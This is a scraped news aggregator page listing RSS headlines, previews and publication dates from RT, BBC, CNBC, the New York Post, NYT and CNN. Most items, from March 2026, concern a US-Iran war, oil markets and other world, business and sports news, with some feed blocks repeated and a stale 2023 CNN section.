Preview The US strike on an Iranian ship is “embarrassing” for New Delhi as the ship was returning from India-hosted drills, Kanwal Sibal tells RT
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 14:09:38 +0000

Maritime traffic shifts to African coasts

Preview Maritime traffic around South Africa has increased amid the escalating war in the Middle East
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 14:07:05 +0000

Thousands of students protest against draft in Berlin (VIDEOS)

Preview Up to 10,000 students have protested in Berlin against new legislation introducing a framework for a draft lottery
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 13:53:22 +0000

Cuba regime change ‘a question of time’ – Trump

Preview A regime change in Cuba is “just a question of time,” Donald Trump has said as Washington steps up military operations abroad
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 13:45:02 +0000

Russia and Ukraine exchange 300 POWs – MOD (VIDEO)

Preview Russia and Ukraine have exchanged 300 POWs each, the Defense Ministry in Moscow has said
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 12:55:52 +0000

US behind strike on Iranian school – NYT

Preview A New York Times analysis has concluded that the US likely carried out the strike on an Iranian girls school that killed at least 168
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 12:24:01 +0000

Hungary seizes millions in gold and cash linked to ‘Ukraine war mafia’

Preview The Hungarian authorities have seized Ukrainian cash and gold as part of a money laundering probe
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 12:14:22 +0000

Mauritius considering legal action against UK

Preview Mauritius is exploring legal action against the UK over delays in ratifying an agreement on the Chagos Archipelago
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 11:58:35 +0000

US won’t allow India to emerge as strong rival like China – official

Preview  Deputy Secretary of State Christopher Landau has warned New Delhi over a trade deal that is “almost at the finish line”
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 11:11:40 +0000

Ukrainian drone strikes kill two civilians in Russia

Preview Ukrainian drones killed two civilians in Kherson Region and injured at least 21 people in Sevastopol, Russian officials have said
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 10:47:28 +0000

US grants India 30-day waiver to import Russian oil

Preview The US claimed the move would ensure stability in the global energy market amid the Middle East crisis
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 09:50:18 +0000

Iran claims it forced US aircraft carrier to retreat

Preview Iranian and US officials have provided conflicting reports about the state of the USS Abraham Lincoln strike group and sustained casualties
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 09:37:27 +0000

Orban responds to Zelensky’s ‘death threat’

Preview Hungary will break Ukraine’s “oil blockade,” PM Viktor Orban has pledged, despite being personally threatened by Vladimir Zelensky
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 09:30:44 +0000

Kenyan police rescue foreign nationals from trafficking ring

Preview Kenyan police has rescued 70 foreign nationals, mostly Ethiopians, from a suspected human trafficking ring
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 08:01:21 +0000

US strikes Iranian drone carrier (VIDEO)

Preview The US has shared a video of an attack on Iran’s drone carrier IRIS Shahid Bagheri
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 03:57:40 +0000

‘They are terrified’: Desperate families plead for evacuation of students stranded in war-torn Iran

Preview Hundreds of stranded Indian students and workers are pleading for evacuation as New Delhi scrambles to keep contact and ensure their safety
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 03:19:55 +0000

‘The threat is a lie’: Meet Israel’s lone anti-war voice in parliament

Preview Ofer Cassif tells RT Israel’s war on Iran is driven by personal and political agendas, not real threats
Read Full Article at RT.com

Article link

Date of publish: Fri, 06 Mar 2026 00:12:55 +0000

Son of last shah tells Russian pranksters Europe should join ‘crusade’ against Iran

Preview Reza Pahlavi, the exiled son of Iran’s last shah, has told Russian pranksters that Europe should join the US-Israeli attacks against Tehran
Read Full Article at RT.com

Article link

Date of publish: Thu, 05 Mar 2026 21:07:24 +0000

Dubai influencers warned over posts depicting war damage

Preview Dubai authorities have threatened influencers publishing materials depicting damage from alleged Iranian strikes with hefty fines and jail
Read Full Article at RT.com

Article link

Date of publish: Thu, 05 Mar 2026 20:54:26 +0000

Macron’s nuclear posturing meets his laughably small arsenal

Preview Despite President Emmanuel Macron‘s announcement, France’s nuclear rhetoric has outpaced its capabilities
Read Full Article at RT.com

Article link

Date of publish: Thu, 05 Mar 2026 20:46:24 +0000

Zelensky refuses to relaunch oil pipeline after threatening Orban

Preview Kiev continues to insist the Druzba pipeline is damaged, while Budapest accuses Ukraine of imposing an “oil blockade”
Read Full Article at RT.com

Article link

Date of publish: Thu, 05 Mar 2026 20:36:01 +0000

Iraq and Cuba hit by blackouts amid US pressure and attacks on Iran

Preview Iraq’s national electricity grid has collapsed after losing Iranian gas supplies, while Cuba blames a US blockade for its blackout
Read Full Article at RT.com

Article link

Date of publish: Thu, 05 Mar 2026 20:15:24 +0000

Israel behind Azerbaijan drone provocations to frame Iran – envoy

Preview Israel may be staging strikes, including the Nakhchivan attack, to frame Iran, Tehran’s envoy to Russia, Kazem Jalali, has told RT
Read Full Article at RT.com

Article link

Date of publish: Thu, 05 Mar 2026 19:54:18 +0000

The Iron Curtain returns, but from the other side

Preview 80 years after Churchill’s Iron Curtain speech: Why the world is entering a new era of division
Read Full Article at RT.com

Article link

Date of publish: Thu, 05 Mar 2026 18:24:19 +0000

News

News feeds below.

BBC News

Mixed messages from Trump leave more questions than answers over war's end

The US president has tried to soothe nerves over oil and markets, but his comments still lack clarity, writes Anthony Zurcher.

Article link

Date of publish: Tue, 10 Mar 2026 02:37:46 GMT

Faisal Islam: Trump comments may have eased oil price surge, but havoc remains

It has been the most volatile day of oil trading in world history, and there is much still to play out.

Article link

Date of publish: Tue, 10 Mar 2026 00:48:12 GMT

Five Iranian footballers granted Australian visas after anthem protest

Concern has grown for team after one critic called them "wartime traitors" for failing to salute during the Iranian anthem.

Article link

Date of publish: Tue, 10 Mar 2026 10:38:32 GMT

US Top News and Analysis

Oil extends slide as investors assess Trump comments on Iran war, Strait of Hormuz

Oil prices plunged after Trump warned that Tehran would be hit "twenty times harder" if it attempted to halt oil flows through the Strait of Hormuz.

Article link

Date of publish: Tue, 10 Mar 2026 08:37:16 GMT

Bill Ackman's Pershing Square files for IPO on the NYSE

The planned listing would give public investors a stake in Ackman's investment platform, which oversees a concentrated portfolio of large-cap companies

Article link

Date of publish: Tue, 10 Mar 2026 11:05:41 GMT

Iran defends strikes on Gulf neighbors. They say a 'huge trust gap' will last for decades

Iran has defended its strikes against its Gulf countries but its neighbors say attacks have damaged trust for a long time.

Article link

Date of publish: Tue, 10 Mar 2026 09:56:24 GMT

New York Post

Travis Kelce finally reveals NFL future as ‘people keep asking’ about retirement

The 36-year-old tight end has spent his entire career playing for the Kansas City Chiefs, beginning with the team back in 2013.

Article link

Date of publish: Tue, 10 Mar 2026 06:57:54 -0400

Travis Kelce finally reveals NFL future as ‘people keep asking’ about retirement

The 36-year-old tight end has spent his entire career playing for the Kansas City Chiefs, beginning with the team back in 2013.

Article link

Date of publish: Tue, 10 Mar 2026 06:57:54 -0400

Michael Porter Jr. has become the face of the Nets — now comes the hard part

Porter has been the best player on their threadbare roster this season, and is likely to be the best again next year — if he’s back.

Article link

Date of publish: Tue, 10 Mar 2026 06:40:00 -0400

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

NYT > Top Stories

Trump’s War in Iran, and Rising Gas Prices, Collide With Midterm Agenda

The attack on Iran has led to a surge in energy prices at a moment when the cost of living is a major issue heading into the fall elections.

Article link

Date of publish: Tue, 10 Mar 2026 03:32:18 +0000

New Supreme Leader Inherits Sprawling, Secretive Office That Dominates Iran

His father, Ayatollah Ali Khamenei, had turned what was traditionally a religious affairs office into a shadowy national security juggernaut.

Article link

Date of publish: Tue, 10 Mar 2026 09:03:19 +0000

War Brings New Water Crises to an Already-Parched Iran

Iran has accused the United States of bombing a desalination plant on Qeshm Island. The country was already facing a severe water shortage.

Article link

Date of publish: Tue, 10 Mar 2026 09:03:24 +0000

BBC News

Mixed messages from Trump leave more questions than answers over war's end

The US president has tried to soothe nerves over oil and markets, but his comments still lack clarity, writes Anthony Zurcher.

Article link

Date of publish: Tue, 10 Mar 2026 02:37:46 GMT

Faisal Islam: Trump comments may have eased oil price surge, but havoc remains

It has been the most volatile day of oil trading in world history, and there is much still to play out.

Article link

Date of publish: Tue, 10 Mar 2026 00:48:12 GMT

Five Iranian footballers granted Australian visas after anthem protest

Concern has grown for team after one critic called them "wartime traitors" for failing to salute during the Iranian anthem.

Article link

Date of publish: Tue, 10 Mar 2026 10:38:32 GMT

G7 to take 'necessary measures' to support energy supplies

Finance ministers and the IEA discussed options for stabilising oil prices which surpassed $100.

Article link

Date of publish: Mon, 09 Mar 2026 23:30:46 GMT

Alexander Butterfield, who revealed Nixon Watergate tapes, dies aged 99

He disclosed then-President Richard Nixon had a recording system in the Oval Office.

Article link

Date of publish: Tue, 10 Mar 2026 09:54:39 GMT

Wildflowers blanket Death Valley in best display since 2016

The California desert is seeing its most colourful display in a decade as flowers cover the region.

Article link

Date of publish: Tue, 10 Mar 2026 10:09:47 GMT

Madagascar military leader sacks cabinet in surprise move

Col Randrianirina, who seized power last year, did not give a reason for dissolving his government.

Article link

Date of publish: Tue, 10 Mar 2026 07:48:51 GMT

Anthropic sues US government for calling it a risk

The artificial intelligence company has been in a public fight with US government leaders over use of its tools like Claude

Article link

Date of publish: Mon, 09 Mar 2026 21:33:05 GMT

China exports surge despite Trump tariffs

Official data shows shipments rose by 20% this year with growth in European and other Asia markets.

Article link

Date of publish: Tue, 10 Mar 2026 06:16:02 GMT

Carney calls three by-elections in Canada that could grant him a majority

The Liberal government currently has 169 seats in parliament, just three shy of a majority in Canada's parliament.

Article link

Date of publish: Mon, 09 Mar 2026 14:49:39 GMT

US teacher killed after toilet paper prank goes wrong

Jason Hughes's family does not want the students prosecuted after the prank turned into a fatal car accident.

Article link

Date of publish: Mon, 09 Mar 2026 17:09:21 GMT

Two men charged with terror offences after homemade bomb thrown outside NYC mayor's home

The city's police commissioner said one of the suspects said he wanted the attack to be "even larger" than the Boston Marathon bombing.

Article link

Date of publish: Tue, 10 Mar 2026 02:57:54 GMT

High-profile US real estate brothers convicted in sex trafficking case

Prosecutors accused the brothers of using their wealth to lure women to parties and luxury homes, then taking advantage of them.

Article link

Date of publish: Tue, 10 Mar 2026 01:48:19 GMT

Alleged Bondi gunman seeks order to suppress family's identity

Naveed Akram is seeking to prevent media publishing details about his mother, sister and brother.

Article link

Date of publish: Mon, 09 Mar 2026 08:13:58 GMT

Guinea opposition leader urges 'direct resistance' after 40 parties dissolved

Cellou Dalein Diallo accuses the junta-leader-turned-president of erasing political threats.

Article link

Date of publish: Mon, 09 Mar 2026 14:25:45 GMT

Why is China set to approve a new law promoting 'ethnic unity'?

A law that could threaten the rights of minority groups is a sign of the direction Xi is taking China.

Article link

Date of publish: Tue, 10 Mar 2026 00:24:39 GMT

Has Hollywood golden boy Timothée Chalamet lost his shine?

Is the backlash against Timothée Chalamet about more than his views on ballet and opera?

Article link

Date of publish: Tue, 10 Mar 2026 00:09:33 GMT

Iran's new leader has never been tested. He now faces an existential battle

Mojtaba Khamenei, 56, enters power as the Islamic republic faces its most serious crisis.

Article link

Date of publish: Mon, 09 Mar 2026 19:51:00 GMT

Bitter times for cocoa farmers as chocolate market slumps

Chocolate bars may have shot up in price but West Africa's cocoa farmers are facing economic ruin.

Article link

Date of publish: Mon, 09 Mar 2026 00:40:56 GMT

Spain's migrants welcome amnesty: 'It will help us in every way'

Madrid cites humanitarian and economic reasons to give undocumented workers legal status.

Article link

Date of publish: Mon, 09 Mar 2026 00:17:54 GMT

Who is Mojtaba Khamenei, Iran's new supreme leader?

Many expect the 56-year-old, who has largely kept a low profile, to continue his father's hardline policies.

Article link

Date of publish: Sun, 08 Mar 2026 21:51:48 GMT

Unanswered questions as search for Nancy Guthrie enters a new month

The disappearance of the mother of TV presenter Savannah Guthrie captivated the US, but police have not made any arrests.

Article link

Date of publish: Sun, 08 Mar 2026 15:03:16 GMT

We've been speaking to Iranians during one week of war. Here's what they said

Ordinary Iranians reflect on seven days of conflict and where they see their country going next.

Article link

Date of publish: Sat, 07 Mar 2026 06:00:32 GMT

The heartwarming tale of a father, a daughter, and a wedding band wowing India

Band Baaja Bitiya is the moving tale of a father who goes to rescue his daughter from her matrimonial home.

Article link

Date of publish: Sun, 08 Mar 2026 00:02:55 GMT

Spectacular images reveal unique sea creatures and corals off Caribbean islands

Scientists discover underwater mountain ranges, golden towers of coral, and never-before-seen sea creatures.

Article link

Date of publish: Sun, 08 Mar 2026 01:38:45 GMT

Weight-loss treatments boom as Kenyan attitudes to beauty change

Kenyan celebrities are driving a surge in weight‑loss and cosmetic procedures, sparking criticism and concerns.

Article link

Date of publish: Sun, 08 Mar 2026 02:57:15 GMT

US missile hit military base near Iran school, video analysis shows

A US Tomahawk missile hit a military base near a primary school in southern Iran where Iranian authorities said 168 people were killed, expert video analysis shows.

Article link

Date of publish: Mon, 09 Mar 2026 15:09:05 GMT

Watch: Why the Iran war is pushing up oil prices

As turmoil continues in the Middle East, the price of crude oil rose to more than $100 a barrel on Monday.

Article link

Date of publish: Mon, 09 Mar 2026 12:30:26 GMT

Watch: Ukrainian anti-drone 'bullet' that could help defend Gulf

The BBC's Diplomatic Correspondent, James Landale, is in Ukraine to see the latest anti-drone technology the country has to offer.

Article link

Date of publish: Mon, 09 Mar 2026 10:15:06 GMT

Watch: Huge flames in Tehran after air strikes on oil depots

Social media footage shows flames leaping into the air and plumes of smoke above the city's skyline.

Article link

Date of publish: Sun, 08 Mar 2026 01:42:48 GMT

'This is a moment of grave peril' - UN humanitarian chief

UN Humanitarian Affairs Lead Tom Fletcher speaks to the BBC about the conflict in the Middle East.

Article link

Date of publish: Sun, 08 Mar 2026 07:05:27 GMT

US Top News and Analysis

Oil extends slide as investors assess Trump comments on Iran war, Strait of Hormuz

Oil prices plunged after Trump warned that Tehran would be hit "twenty times harder" if it attempted to halt oil flows through the Strait of Hormuz.

Article link

Date of publish: Tue, 10 Mar 2026 08:37:16 GMT

Bill Ackman's Pershing Square files for IPO on the NYSE

The planned listing would give public investors a stake in Ackman's investment platform, which oversees a concentrated portfolio of large-cap companies

Article link

Date of publish: Tue, 10 Mar 2026 11:05:41 GMT

Iran defends strikes on Gulf neighbors. They say a 'huge trust gap' will last for decades

Iran has defended its strikes against its Gulf countries but its neighbors say attacks have damaged trust for a long time.

Article link

Date of publish: Tue, 10 Mar 2026 09:56:24 GMT

Oracle earnings will show whether its expensive AI bet is starting to pay off

Oracle's $300 billion deal with OpenAI established it as a major player in AI cloud computing alongside Amazon, Google and Microsoft.

Article link

Date of publish: Tue, 10 Mar 2026 11:00:02 GMT

Stellantis taps Toyota, Bosch suppliers for hybrid technologies for new Jeeps

Jeep maker Stellantis is leaning on technologies from automotive suppliers for its newest hybrid vehicles, CNBC has learned.

Article link

Date of publish: Tue, 10 Mar 2026 10:00:01 GMT

Warsh to meet Tillis as Senate confirmation remains blocked

Sen. Thom Tillis, R-N.C., has refused to advance Warsh's confirmation until a probe into Fed Chair Jerome Powell is dropped.

Article link

Date of publish: Tue, 10 Mar 2026 11:11:09 GMT

South Korea opposed to U.S. moving air defense systems in the country to Middle East: President Lee

Lee maintained that even if the assets were moved out of the country, its deterrence capability against North Korea will not be affected.

Article link

Date of publish: Tue, 10 Mar 2026 07:04:34 GMT

Kevin Mandia sold his cybersecurity company to Google in 2022. He has a fresh $190 million for a new venture

Mandiant founder Kevin Mandia is staying in cybersecurity after selling his prior company to Google, but now he's focused on AI.

Article link

Date of publish: Tue, 10 Mar 2026 10:00:01 GMT

Lego keeps beating the toy industry. Its secret weapon is not what you'd expect

Lego on Tuesday reported a 12% jump in revenue for fiscal year 2025 and reported consumer sales that far outpace the broader toy industry.

Article link

Date of publish: Tue, 10 Mar 2026 08:00:01 GMT

Million-dollar earners have already stopped paying into Social Security for 2026

The Social Security payroll tax is capped at $184,500 in 2026. Some high earners have already stopped paying into the program for the year.

Article link

Date of publish: Mon, 09 Mar 2026 23:14:54 GMT

Bluesky CEO Jay Graber stepping back, former WordPress parent chief Toni Schneider named interim boss

Bluesky was born out of Twitter by Jack Dorsey in 2019 and rose to popularity as an alternative to X after Elon Musk's acquisition.

Article link

Date of publish: Tue, 10 Mar 2026 04:16:18 GMT

Democrats threaten more Iran war powers votes, call for Hegseth, Rubio to testify

Democrats are vowing to interrupt normal order in the Senate unless Pete Hegseth and Marco Rubio testify publicly.

Article link

Date of publish: Tue, 10 Mar 2026 00:03:19 GMT

Volkswagen flags a tough year ahead as 2025 profit halves on tariffs, China competition

Volkswagen reported a more than 50% drop in annual operating profit, citing the impact of U.S. tariffs, currency effects and a strategic shift at Porsche.

Article link

Date of publish: Tue, 10 Mar 2026 10:01:05 GMT

Elon Musk's xAI wants to build a power plant in Mississippi. Regulators plan a key meeting on Election Day

The NAACP has accused Mississippi regulators of rushing a meeting to approve xAI plans for a massive, methane-burning power plant in Southaven.

Article link

Date of publish: Tue, 10 Mar 2026 00:30:53 GMT

There's another big reason why shipping companies and insurers aren't willing to risk the Strait of Hormuz

An environmental catastrophe poses a massive risk in a region that has glittering high-rise buildings, posh beachfront resorts and booming commercial centers.

Article link

Date of publish: Mon, 09 Mar 2026 22:33:07 GMT

Anthropic was the Pentagon's choice for AI. Now it's banned and experts are worried

Anthropic's partnerships with Amazon and Palantir helped it make inroads into the DOD, and its blacklisting is concerning to many industry experts.

Article link

Date of publish: Mon, 09 Mar 2026 22:01:05 GMT

Familiar winners dot Monday's stock leaderboard. Here's what the market is signaling

Every weekday, the Investing Club releases the Homestretch; an actionable afternoon update just in time for the last hour of trading.

Article link

Date of publish: Mon, 09 Mar 2026 20:18:08 GMT

Trump says Iran war will end 'very soon,' predicts lower oil prices

U.S. stock market indexes rose earlier in the day after an initial report that President Donald Trump said he believed the Iran war was largely finished.

Article link

Date of publish: Tue, 10 Mar 2026 00:17:17 GMT

Fears of 1970s-style stagflation arise with oil spike to $100. How big a threat is it?

High inflation and slow growth present a double threat, as measures like interest rate cuts and government spending only aggravate inflation.

Article link

Date of publish: Mon, 09 Mar 2026 18:11:12 GMT

Nvidia plans open-source AI agent platform ‘NemoClaw’ for enterprises: Wired

Nvidia is planning to lean into the agentic AI craze and launch an open-source platform for AI agents called 'NemoClaw,' according to a report.

Article link

Date of publish: Tue, 10 Mar 2026 07:09:24 GMT

China’s nudge, U.S. waiver and Iran tensions test India’s economic balancing act

India is trying to preserve its long-standing neutral foreign policy as escalating tensions around Iran threaten its oil supply and expose New Delhi to pressure from both Washington and Beijing.

Article link

Date of publish: Tue, 10 Mar 2026 09:34:14 GMT

OpenAI to buy cybersecurity startup Promptfoo to better safeguard AI agents

Promptfoo's team will join Sam Altman-led OpenAI, and its technology will be integrated into the Frontier platform for AI agents.

Article link

Date of publish: Mon, 09 Mar 2026 21:22:45 GMT

There's another energy market that may get hit harder than oil by Strait of Hormuz closure

Roughly 20% of global liquefied natural gas flows through the Strait.

Article link

Date of publish: Mon, 09 Mar 2026 20:51:55 GMT

The Iran war has put the brakes on the next Bank of England rate cut

Before the war in Iran erupted, the Bank of England was widely predicted to be set to cut interest rates in March or April. Don't count on it, economists say.

Article link

Date of publish: Tue, 10 Mar 2026 09:13:04 GMT

Top permitting-reform Republican, Democratic senators meeting as talks thaw: API chief

Speeding up the federal permitting process is a top priority for the energy and tech industries.

Article link

Date of publish: Mon, 09 Mar 2026 23:40:44 GMT

China exports sharply beat expectations as trade surplus in the first two months surges to highest on record

China typically combines January and February trade data to smooth distortions from the shifting Lunar New Year holiday.

Article link

Date of publish: Tue, 10 Mar 2026 04:23:26 GMT

FBI obtains records of Arizona Senate audit of 2020 Maricopa County election results, Republican says

President Donald Trump touted the fact that the records had been obtained by the FBI. He long has claimed he was cheated out of victory in the 2020 election.

Article link

Date of publish: Mon, 09 Mar 2026 21:14:36 GMT

Seventh U.S. service member killed in Iran war identified as Sgt. Benjamin Pennington

Pennington, 26, from Glendale, Kentucky, was wounded on March 1 during an Iranian strike at Prince Sultan Air Base in Saudi Arabia. He died on Sunday.

Article link

Date of publish: Mon, 09 Mar 2026 21:40:36 GMT

Anthropic sues Trump administration over Pentagon blacklist

The lawsuit says Anthropic is being harmed "irreparably" and could lose hundreds of millions of dollars.

Article link

Date of publish: Tue, 10 Mar 2026 04:24:01 GMT

Congressional Democrats demand reversal of Russian oil sales into India as energy prices soar

Russia is reportedly helping Iran target U.S. forces in the Middle East and could now benefit from a windfall of new oil and gas sales.

Article link

Date of publish: Mon, 09 Mar 2026 15:14:17 GMT

New York Post

Travis Kelce finally reveals NFL future as ‘people keep asking’ about retirement

The 36-year-old tight end has spent his entire career playing for the Kansas City Chiefs, beginning with the team back in 2013.

Article link

Date of publish: Tue, 10 Mar 2026 06:57:54 -0400

Travis Kelce finally reveals NFL future as ‘people keep asking’ about retirement

The 36-year-old tight end has spent his entire career playing for the Kansas City Chiefs, beginning with the team back in 2013.

Article link

Date of publish: Tue, 10 Mar 2026 06:57:54 -0400

Michael Porter Jr. has become the face of the Nets — now comes the hard part

Porter has been the best player on their threadbare roster this season, and is likely to be the best again next year — if he’s back.

Article link

Date of publish: Tue, 10 Mar 2026 06:40:00 -0400

Why even Ayatollah Khamenei opposed his impotent nepobaby son Mojtaba becoming Iran’s next supreme leader

The slain supreme leader was so opposed to his son taking power that he even included it in his will.

Article link

Date of publish: Tue, 10 Mar 2026 06:30:00 -0400

Why Bo Bichette is the key to the Mets pulling off this radically revamped defense

The two big changes involve the infield corners. The key is how Bichette and Polanco perform, because their main attraction is as hitters.

Article link

Date of publish: Tue, 10 Mar 2026 06:15:00 -0400

New ‘keto pill’ mimics popular diet without giving up carbs

Keto is a high-fat, moderate-protein and low-carb diet designed to plunge the body into ketosis, where it burns fat instead of carbs for fuel.

Article link

Date of publish: Tue, 10 Mar 2026 06:00:00 -0400

NYC pothole complaints surge to highest level in years – with nearly half involving this borough: ‘My tires are literally crying’

Pothole complaints are surging in the Big Apple for the first time in years after two monster snowfalls recently pummeled the region -- with one borough buried in thousands of gripes, city data show.

Article link

Date of publish: Tue, 10 Mar 2026 06:00:00 -0400

A DNA test revealed I have a half sibling through my dad — should I confront him? What if he doesn’t even know they exist?

Gail Rudnick and Kim Murstein tackle this family dilemma and more, with their typical no nonsense approach.

Article link

Date of publish: Tue, 10 Mar 2026 06:00:00 -0400

Paige Shiver accuses Michigan of not protecting her from disgraced football coach Sherrone Moore in first remarks on scandal

“Institutions entrusted with the education and safety of students and employees have a fundamental duty to ensure that power is never used to exploit or silence others.”

Article link

Date of publish: Tue, 10 Mar 2026 05:40:24 -0400

Five members of Iranian women’s soccer team granted asylum by Australia

Australia granted asylum to five members of the Iranian women’s soccer team who were visiting the country for a tournament when the Iran war began, a government minister said Tuesday.

Article link

Date of publish: Tue, 10 Mar 2026 05:16:08 -0400

Trump takes his war against Thomas Massie straight to his home Kentucky district

Trump endorsed Massie’s primary opponent, Ed Gallrein, who will be at the event in Hebron, Ky.

Article link

Date of publish: Tue, 10 Mar 2026 05:00:00 -0400

JD Vance attends dignified transfer for seventh US soldier killed in Iran war

Vice President JD Vance joined the grieving family of a Kentucky man who was the seventh US service member to die in combat during the Iran war as his remains were brought back to the US Monday evening.

Article link

Date of publish: Tue, 10 Mar 2026 03:48:42 -0400

Aw, shucks! 99-year-old dad helps son, 80, finally crack free oysters promotion at Alabama restaurant after 50-year wait

“We felt like our dad was going to make it to 100 because he’s in great health. We’ve been talking about it as a family for 25, 30 years.”

Article link

Date of publish: Tue, 10 Mar 2026 03:24:06 -0400

Dear Abby: Is it crazy to divorce my husband over losing my sex drive?

Dear Abby advises a woman who doesn't know how to please her husband in bed after losing her sex drive.

Article link

Date of publish: Tue, 10 Mar 2026 03:00:00 -0400

Knicks’ Mohamed Diawara posterizes Nic Batum — who he grew up watching — with vicious dunk

His first NBA dunk was a poster. 

Article link

Date of publish: Tue, 10 Mar 2026 02:16:54 -0400

Search continues for daredevil motorcyclist seen evading cops on freeway

The unidentified rider is wanted by authorities after fleeing officers from the Pasadena Police Department and tearing down the freeway in a brazen getaway--blatantly disregarding life, limb and law.

Article link

Date of publish: Tue, 10 Mar 2026 01:48:43 -0400

CA dems hit reverse on climate rule they backed months ago over fears energy market on brink of collapse

Notably, the lawmakers raising concerns previously voted to approve the legislation in September that re-authorized the cap-and-invest program, which directed regulators to update the rules--the very process CARB is now carrying out.

Article link

Date of publish: Tue, 10 Mar 2026 01:41:13 -0400

FAA cancels groundstop for JetBlue planes

The ⁠ground stop was issued at ⁠the request of the airline, the ​FAA notice ​said, ​without adding ‌further details.

Article link

Date of publish: Tue, 10 Mar 2026 01:29:05 -0400

Sloppy Knicks plagued by turnovers for second straight game in loss to Clippers

A day earlier, coach Mike Brown made an impassioned plea to his players about taking care of the ball. They didn’t listen. 

Article link

Date of publish: Tue, 10 Mar 2026 01:08:50 -0400

Major winner Gary Woodland reveals heartbreaking battle with PTSD after brain surgery

Major winner Gary Woodland reveals heartbreaking battle with PTSD after brain surgery.

Article link

Date of publish: Tue, 10 Mar 2026 01:08:03 -0400

Islanders GM Mathieu Darche doesn’t think playoff cap will be ‘an issue at all’

They aren’t currently worried about creating a cap squeeze.

Article link

Date of publish: Tue, 10 Mar 2026 00:54:40 -0400

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

Judge in Fox News-Dominion defamation trial: 'The parties have resolved their case'

The judge just announced in court that a settlement has been reached in the historic defamation case between Fox News and Dominion Voting Systems.

Article link

Date of publish: Wed, 19 Apr 2023 08:28:17 GMT

'Difficult to say with a straight face': Tapper reacts to Fox News' statement on settlement

A settlement has been reached in Dominion Voting Systems' defamation case against Fox News, the judge for the case announced. The network will pay more than $787 million to Dominion, a lawyer for the company said.

Article link

Date of publish: Tue, 18 Apr 2023 21:17:44 GMT

Millions in the US could face massive consequences unless McCarthy can navigate out of a debt trap he set for Biden

• DeSantis goes to Washington, a place he once despised, looking for support to take on Trump • Opinion: For the GOP to win, it must ditch Trump • Chris Christie mulling 2024 White House bid • Analysis: The fire next time has begun burning in Tennessee

Article link

Date of publish: Tue, 18 Apr 2023 20:34:45 GMT

White homeowner accused of shooting a Black teen who rang his doorbell turns himself in to face criminal charges

• 'A major part of Ralph died': Aunt of teen shot after ringing wrong doorbell speaks • 20-year-old woman shot after friend turned into the wrong driveway in upstate New York, officials say

Article link

Date of publish: Wed, 19 Apr 2023 04:29:05 GMT

Newly released video shows scene of Jeremy Renner's snowplow accident

Newly released body camera footage shows firefighters and sheriff's deputies rushing to help actor Jeremy Renner after a near-fatal snowplow accident in January. The "Avengers" actor broke more than 30 bones and suffered other severe injuries. CNN's Chloe Melas has more.

Article link

Date of publish: Tue, 18 Apr 2023 14:09:43 GMT

Jake Gyllenhaal and Jamie Lee Curtis spent the Covid-19 lockdown together

It's sourdough bread and handstands for Jake Gyllenhaal and Jamie Lee Curtis.

Article link

Date of publish: Tue, 18 Apr 2023 14:40:32 GMT

Toddler crawls through White House fence, prompts Secret Service response

A tiny intruder infiltrated White House grounds Tuesday, prompting a swift response from the US Secret Service.

Article link

Date of publish: Tue, 18 Apr 2023 17:38:16 GMT

Jamie Foxx remains hospitalized nearly a week after 'medical complication'

Jamie Foxx remains hospitalized in Georgia nearly a week after his daughter revealed the actor experienced a "medical complication," a source with knowledge of the matter told CNN on Monday.

Article link

Date of publish: Tue, 18 Apr 2023 00:27:07 GMT

A 13-year-old dies after participating in a Benadryl TikTok 'challenge'

A 13-year-old in Ohio has died after "he took a bunch of Benadryl," trying a dangerous TikTok challenge that's circulating online, according to a CNN affiliate and a GoFundMe account from his family.

Article link

Date of publish: Wed, 19 Apr 2023 15:01:06 GMT

See pizza delivery guy take out suspect fleeing police

Pizza guy delivers more than a pie, taking out a fleeing suspect. CNN's Jeanne Moos shows him putting his best foot forward.

Article link

Date of publish: Tue, 18 Apr 2023 16:40:22 GMT

Netflix is winding down its DVD business after 25 years

Netflix is officially winding down the business that helped make it a household name.

Article link

Date of publish: Tue, 18 Apr 2023 20:10:51 GMT

FTC chair Lina Khan warns AI could 'turbocharge' fraud and scams

Artificial intelligence tools such as ChatGPT could lead to a "turbocharging" of consumer harms including fraud and scams, and the US government has substantial authority to crack down on AI-driven consumer harms under existing law, members of the Federal Trade Commission said Tuesday.

Article link

Date of publish: Tue, 18 Apr 2023 17:59:38 GMT

Eating too much of these foods is driving the rise in type 2 diabetes, study says

Gobbling up too many refined wheat and rice products, along with eating too few whole grains, is fueling the growth of new cases of type 2 diabetes worldwide, according to a new study that models data through 2018.

Article link

Date of publish: Mon, 17 Apr 2023 16:02:46 GMT

ADHD medication abuse in schools is a 'wake-up call'

